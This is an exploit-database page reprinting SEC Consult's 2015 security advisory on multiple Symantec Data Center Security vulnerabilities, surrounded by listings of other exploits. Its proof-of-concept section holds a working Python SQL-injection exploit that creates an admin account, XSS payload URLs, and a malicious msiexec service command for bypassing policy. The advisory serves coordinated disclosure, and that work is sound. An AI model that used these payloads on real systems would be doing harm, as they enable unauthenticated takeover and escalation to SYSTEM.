Menu

Improved exploit search engine. Try it out

"Symantec Data Center Security - Multiple Vulnerabilities"

Author

"SEC Consult"

Platform

multiple

Release date

2015-01-26

Release Date Title Type Platform Author
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-10 "Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access" dos multiple "Google Security Research"
2019-07-09 "Firefox 67.0.4 - Denial of Service" dos multiple "Tejas Ajay Naik"
2019-07-03 "Symantec DLP 15.5 MP1 - Cross-Site Scripting" webapps multiple "Chapman Schleiss"
2019-07-01 "CyberPanel 1.8.4 - Cross-Site Request Forgery" webapps multiple "Bilgi Birikim Sistemleri"
2019-07-01 "Sahi pro 8.x - Directory Traversal" webapps multiple "Alexander Bluestein"
2019-07-01 "SAP Crystal Reports - Information Disclosure" webapps multiple "Mohamed M.Fouad"
2019-07-01 "Varient 1.6.1 - SQL Injection" webapps multiple "Mehmet EMIROGLU"
2019-06-26 "Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion" dos multiple "Google Security Research"
2019-06-24 "GrandNode 4.40 - Path Traversal / Arbitrary File Download" webapps multiple "Corey Robinson"
2019-06-25 "SuperDoctor5 - 'NRPE' Remote Code Execution" remote multiple "Simon Gurney"
2019-06-18 "Sahi pro 8.x - Cross-Site Scripting" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 8.x - SQL Injection" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 7.x/8.x - Directory Traversal" webapps multiple "Goutham Madhwaraj"
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-28 "Phraseanet < 4.0.7 - Cross-Site Scripting" webapps multiple "Krzysztof Szulski"
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2018-08-16 "Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "SEC Consult"
2018-07-13 "Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure" webapps php "SEC Consult"
2018-07-13 "WAGO e!DISPLAY 7300T - Multiple Vulnerabilities" webapps php "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2018-03-05 "ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection" webapps php "SEC Consult"
2017-12-07 "OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting" webapps php "SEC Consult"
2017-10-18 "Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities" webapps php "SEC Consult"
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-05-09 "I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting" webapps php "SEC Consult"
2017-03-22 "Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-03-01 "Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting" webapps xml "SEC Consult"
2016-10-11 "RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection" webapps xml "SEC Consult"
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-02-10 "Yeager CMS 1.2.1 - Multiple Vulnerabilities" webapps php "SEC Consult"
2015-12-10 "Skybox Platform < 7.0.611 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-06-30 "Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-14 "Ansible Tower 2.0.2 - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2014-12-23 "NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-11-06 "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-07-16 "BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities" webapps linux "SEC Consult"
2014-07-14 "Shopizer 1.1.5 - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-07-01 "IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-06-09 "WebTitan 4.01 (Build 68) - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-04-24 "WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion" webapps php "SEC Consult"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/35915/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/35915/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/35915/35516/symantec-data-center-security-multiple-vulnerabilities/download/", "exploit_id": "35915", "exploit_description": "\"Symantec Data Center Security - Multiple Vulnerabilities\"", "exploit_date": "2015-01-26", "exploit_author": "\"SEC Consult\"", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
             title: Multiple critical vulnerabilities
          products: Symantec Data Center Security: Server Advanced (SDCS:SA)
                    Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
     fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
                    vulnerabilities were fixed, but mitigations exist
            impact: Critical
        CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
          homepage: http://www.symantec.com
             found: 2014-09-19
                by: Stefan Viehböck
                    SEC Consult Vulnerability Lab
                    https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"

Source:
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products


Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.

SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).

Furthermore the SDCS:SA Client protections can be bypassed in several ways.

It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.

Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.

Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.

No prior authentication is needed to exploit this vulnerability.

Affected script:
https://<host>:4443/sis-ui/authenticate


2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The applications suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.

Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp


3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver, version information (OS, Java) and is accessible without prior
authentication.

Affected script:
https://<host>:8081/webui/admin/environment.jsp


4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.

Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!

- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.

- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.

- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the System.

- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).

- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.

Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:

INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',
'2014-09-12 07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);

The code used to exploit the SQL injection vulnerability is listed below:

import httplib
def send_request(host,data):
	params = data
	headers = {"AppFire-Format-Version": "1.0",
	           "AppFire-Charset": "UTF-16LE",
	           "Content-Type":"application/x-appfire",
	           "User-Agent":"Java/1.7.0_45",
	           }
	conn = httplib.HTTPSConnection(host)
	conn.request("POST", "/sis-ui/authenticate", params, headers)
	response = conn.getresponse()
	data=response.read()
	conn.close()	
	return response,data

header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')

eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag

response,data = send_request("<host>:4443",payload)

print data.decode('utf-16le')
print response.status


As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS.
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.


2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>


3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URLs discloses internal information:
https://example.com:8081/webui/admin/environment.jsp


4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.

- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.

- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.

- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted "safe privileges" when started as a service (usually
"Windows Installer" parameter "/V"). This can be abused by creating a service
that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid
.msi file. Upon service start the .msi file is executed with "safe privileges"
privileges and not subject to any SDCS:SA Client checks.

sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i
c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service

- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.



Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
           channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
           version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
           target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.



Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).

Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:

More information can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00

http://www.symantec.com/business/support/index?page=content&id=TECH227679
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071


Workaround:
-----------
See solution.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2015